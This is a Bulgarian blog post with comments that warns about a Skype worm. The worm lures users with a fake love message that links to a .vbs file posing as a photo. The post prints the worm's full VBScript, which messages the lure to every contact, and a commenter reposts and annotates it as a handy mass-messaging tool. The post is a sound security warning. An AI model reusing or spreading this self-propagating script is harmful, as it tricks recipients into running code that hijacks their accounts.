Вчера :Веси: получи интересно съобщение на шльокавица от една от нейните приятелки в СКАЙП:
> Искам да ти призная , че те обичам много … Просто ме беше срам да ти го кажа преди това (blush) Поздравче за теб миличко : http://lоfffkаmtе.hit.bg/mоqsnimkа.vbs :*
>
> _връзката умишлено е сгрешена тук, за да не кликне някой четящ по погрешка на нея, иначе в SKYPE си беше наред_
При кликване на връзката се отваря стандартен прозорец, който подканя потребителя за “Open” или “Save”. Очаквайки снимка, повечето наивни потребители ще кликнат на Open, след което я получат, я не още едно съобщение и като резултат на машинката им ще се изпълни следната зловредна програма:
on error resume next
set NrrlP = WScript.CreateObject("Scripting.FileSystemObject")
set uDlVA = wscript.createobject("wscript.shell")
set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")
yADAl.Client.Start()
yADAl.Attach()
For Each GAG In yADAl.Friends
yADAl.SendMessage GAG.handle,"Искам да ти призная , че те обичам много ... Просто ме беше срам да ти го кажа преди това (blush) Поздравче за теб миличко : http://lofffkamte.hit.bg/moqsnimka.vbs :* "
next
msgbox "bY GENCHO411 ( http://galaxy.forumi.bg )"
Хубаво е, че бях около Веси, когато тя получи съобщението. 99% съм сигурен, че и тя щеше да се върже. Не че в конкретния случай щеше да се случи нещо по-сериозно (освен шеговито обяснение в любов на нея към всичките ѝ контакти, заедно с връзчица към “снимката” ѝ). Но тази програмка лесно може да се преправи така, че да нанесе сериозна вреда на машината ѝ.
Практически, когато всеки от нас не гледа какво стартира (особено ако е получено от “приятелски” контакт), той рискува данните си, а заедно с това и парите си (възможно е да му вземат всички пароли от IE/firefox например), че и като нищо и сигурността си (адреси и т.н.). Може да ви се струва малко параноично, но ако искате да сте сигурни, че само вие разполагате с компютъра и с данните си, трябва __всеки__ път, когато получите каквато и да е връзка по който и да е чат клиент, да поглеждате разширението ѝ.
Разширението (в случая – vbs) е това, което показва какво точно компютърът ви ще направи с данните, които ще източи от външния сайт. В този конкретен случай VBS е нищо повече освен Visual Basic Script. А това си е програмен език, т.е. оторизирайки (чрез “Open”) изпълнението му вие практически казвате “Направи каквото искаш с този компютър и с данните в него”. Никаква антивирусна, firewall или друга защита в случая няма да ви спаси. Много малко червеи от този вид се разпознават от антивирусните програми – най-вече поради факта, че лесно се променят и всеки злосторник може да го стори. И ако злосторника зариби ваш приятел, и ако вие не обърнете внимание на разширението, лесно може да станете и вие жертва. И след това ще се почнат едни приказки за това кое е по-сигурно и кое не е.
Накратко:
* Гледайте _внимателно_ разширението на всяка връзка, която изпълнявате във вашия компютър. Ако е JPG/BMP/PNG/PCX в повечето случаи сте ОК. Ще пропусна възможността компютърът ви да не е защитен с последните поправки на Windows. Ако това е така, дори отваряне на някой от тези файлове може да нанесе сериозни щети на вас и данните ви. Ако не може да познаете разширението, по-добре не отваряйте връзката. Ако пък много искате да я отворите, попитайте някой професионалист за помощ.
* По принцип работете с не-администраторски привилегии. За жалост, в 99% от компютрите, за които знам (преди Windows Vista) потребителската сметка с която се работи има пълни, администраторски привилегии, което значи че ако злосторник проникне по който и да е начин, може да постави “на колене” цялата система. За това как се работи с не-администраторски привилегии може да пиша някой друг път, ако не ме примързи.
Като цяло съм бил свидетел не на един случай, в който ние обвиняваме операционната система за това, че имаме вирус, червей или spyware. Факт е, че Windows е най-разпространената OS, и като такава е и най-атакуваната. Необразования потребител (а 90% от потребителите са необразовани) обикновено не знаят въобще как да се предпазят, а като стане белята е много по-удобно (и по-човешко :)) да обвиним някой/нещо друго, нали?
Надявам се чатещите непрофита да прочетат това и да го запомнят. Питайте, ако имате въпроси. Защото след това става късно :).
И аз го получих тоя спам, но не посмях да отворя прозореца. Разумът надделя над любопитството. 🙂
VBS бачка в IE, пич 🙂
@m: Първо, мразя анонимни коментари. Второ, не разбирам какво искаш да кажеш. VBS “бачка” навсякъде, където се опиташ да го изпълниш. Както IE, така и Firefox, и ShellExecute, и от command prompt и т.н.
Хайде да сме малко по-конкретни, ако може? Какво искаш да кажеш?
И още нещо – откъде накъде ще съм ти “пич”?!
мммммм тва вирусите са ужасно гадно нещо… Благодаря за полезната информация 🙂
Хах, печелиш почетната статуетка Златен алабаш 🙂 Ако ми изпълниш vbs в чиста инсталация на браузър, с ядро различно от тва на MSIE, ще те препоръчам за r&d в MS QA-тима 😀
А като сме тръгнали да споделяме кой какво мрази (много мило от твоя страна, че започна пръв) и аз мразя google ads ;D
@М: VBS се изпълнява от Windows Scripting Host. За повече информация виж страницата му в MSDN.
Освен това аз познавам достатъчно хора от QA екипът на Майкрософт, за да работя като част от него, ако поискам.
Всъщност тази статия е за червея и за това колко е лошо да се клика “автоматизирано” върху Open! Не е за това дали Firefox или който и да е друг браузър би изпълнил VBS. Просто защото никой браузър не би го изпълнил. Както съм загатнал и в статията, VBS се изпълнява от външно за браузъра приложение.
Смятам, че по този въпрос се каза достатъчно.
Ти си велик, аз съм те признал ;D само с vbs-a малко не си в час….
п.п. смятай к’вото си искаш, не пречиш на никого
Дам .. това е още едно доказателство за преливащата тъпотия. Повечето компютърно неграмотни използват Skype без да си дават сметка какво е това изобщо. От там идва и решението да се пусне такъв линк на Skype. От де тия люде неграмотни да знаят, че това разширение не е такова за снимка, а всъщност “какво е разширение?!?!” 🙂
А на всичкото отгоре и някой анонимен пич ти дава съвет какво да пишеш и случаи, при които си прав и при които трябва да му се извиниш. 🙂
Skype, IE and stupidity comes together!!!
Cheers mate!
И аз получих онзи ден това съобщение, но не кликнах на линка.
аз пък вижте какво получих в Skype
[27.8.2007 г. 11:52:05] ŹŊĊ-ʼnbžŻź- каза: 7 363 175 23[зареди]
[27.8.2007 г. 11:52:15] ŹŊĊ-ʼnbžŻź- каза: 7 363 175 23 [зареди]
[27.8.2007 г. 11:52:27] ŹŊĊ-ʼnbžŻź- каза: 7 363 175 23 [зареди]
[27.8.2007 г. 11:52:39] ŹŊĊ-ʼnbžŻź- каза: 7 363 175 23 [зареди]
[27.8.2007 г. 11:52:56] ŹŊĊ-ʼnbžŻź- каза: 7 363 175 23 [зареди]
и ако трябва да бъда честна- направо блокирах този абонат (даже и не го знам кой е)
дам този VBS е много гаден, но има антивирусна която го засича – Касперски 🙂 (при опит за Save или Open на vbs филе-а Касп индикира че това е worm 🙂
Е аз се хванах на простотията описана по горе….та някои да има идея как да го махна тва чудо сега?!
@Boyan: Ами в коментарите по-горе е описано някои как са успяли. Трябва да прочетеш 🙂
Братлета, тва vbs е много полезно, ако да речем искаш да кажеш ЧНГ на всичките си абонати, както аз направих! Само че аз съм с АВАСТ, и тя го откри като вирус, затова я спрях антивирусната, пуснах си vbs- а и гледах сеир! После го изтрих и всичките м иабонати бяха доволни и ми върнаха ЧНГ! 🙂 Яко е измислено, но внимавайте като го дърпате от сайтове и ис сложете аваст! Най- добрия антивирус! :):):)
Хора, от днес следобяд имам спам в скайпа си !! просто една приятелка ми прати някакъв архивиран файл и аз го получих, но така и не можах да го отворя.. след като се опитах не стана!! и когато започнаха след 2 минути да ме питат абонатите ми какво е това, което им изпращам, разбрах че е спам..написах на профила си към всички да не го приемат в никакъв случай !! след което скайпа ми се затвори,. от съображения за сигурност и паролата ми се е сменила.. и сега когато влизам за да я променя ми пише нещо за някакви 24 часа.. и пак да опитам след като минат.. сега някой друг е в скайпа ми и не разбирам с каква цел, след като не пише на никого!! поне така научавам от тези абонати с които сега контактувам.. КАКВО ДА ПРАВЯ ?!!? тоя спам или вирус не ми е нападнал компютъра.. но кога ще излезе и от скайпа ми .. помогнете ПЛС !! ;(
Това е станало със скаипа Ти -Кражба на скайп парола- http://secrets-bg.com/forum/index.php?topic=73.0
Дончо много си надут за блогър 😀
Много може да ми навреди на машината, направо ще ми изгориш дъното с подходящия vbs, добре че ме защити 😉 Някой “умен” параноик като теб е решил че антивирусната трябва да пищи за всеки vbs и от половин година насам ми се налага да я деактивирам, преди да го използвам… Добре де, аз ако бях програмист и работех с VB, какво правим?! То бива бива дебилизъм в комбинация с параноя, но това е прекалено! Колко голям кретен трябва да си че да си пазиш паролите в IE например? Много ясно че ще си ги пиша всеки път или ще ми вкараш keyloger под формата на vbs?
Та да се върна на мисълта си преди да съм я забравил 🙂 Всъщност точно този скрипт е доста полезен, защото е перфектен начин ако искаш да пратиш някакво съобщение на всичките си контакти, например:
on error resume next // при грешка давай нататък
set NrrlP = WScript.CreateObject(“Scripting.FileSystemObject”) // някаква променлива предполагам, клас или каквото е там се създава
set uDlVA = wscript.createobject(“wscript.shell”) // май се дърпат юзърите от тук 🙂
set yADAl = WScript.CreateObject(“Skype4COM.Skype”, “Skype_”) // предполагам и достъп до скайп клиента все пак си трябва за целта
yADAl.Client.Start() // така де 🙂
yADAl.Attach() // ясно че гадая без да имам идея което точно за какво е, но ми разбрахте мисълта
For Each GAG In yADAl.Friends // а ето го и списъка който ни трябва в едно цъкълче for и хоп
yADAl.SendMessage GAG.handle,”Весела коледа и щастлива нова година” // пращаме това на всички
next
msgbox “bY Дадо Коледа” // а това освен да се похвалиш че ти си го писал, може и просто да послужи за да бъде уведомен ползващия го, кога операцията е приключила
И без да разбирам от програмиране ми стига акъла колкото да подменя текста, но все пак какво прави останалата част от кода, би било добре да споделите 🙂 Така както съм дал пример, ред по ред по едно коментарче моля! И въпреки че до сега не съм имал проблеми с него и ми е ясно че не може да навреди този код, но все пак предпочитам да знам и подробности. Ясно че и един ред може да е достатъчен за да ти навреди, но колко да ти навреди. Освен харда да ми форматира и аз да си възстановя всичко до 5 минути с ghost, не виждам друго какво неудобство може да ми създаде един скрипт, но както и да е 🙂 Мисълта ми е че когато правите подобни параноични изказвания, моля не обяснявайте само като за кретените. На принципа няма скрипт няма проблем… А моля обяснете ред по ред какво точно се случва, за да може да се използва и позитивната страна на нещата, все пак такава е и основната идея!
И надявам се приемате градивна критика, но за всеки случай ще вкарам и аз малко параноя и ще взема да постна през прокси, че не ми се занимава с комплексирани ентосиасти, решили да изпробват липсата ми на адекватна защита, поради факта че такава не може да има 🙂
@Дадо Коледа: Аз приемам за зловреден код всичко, което идва от Интернет, представя се за нещо друго (в случая – снимка), пък прави нещо трето. Това колко полезно го намираш ти си е твоя лична работа.
Този блог изразява моето мнение. Никой не е длъжен да го чете, да му вярва или още повече – да го следва. Всеки обаче е длъжен да спазва добрия тон. Започваш с това, че съм “умен параноик”, а свършваш с надежда да приема градивна критика? Хайде де!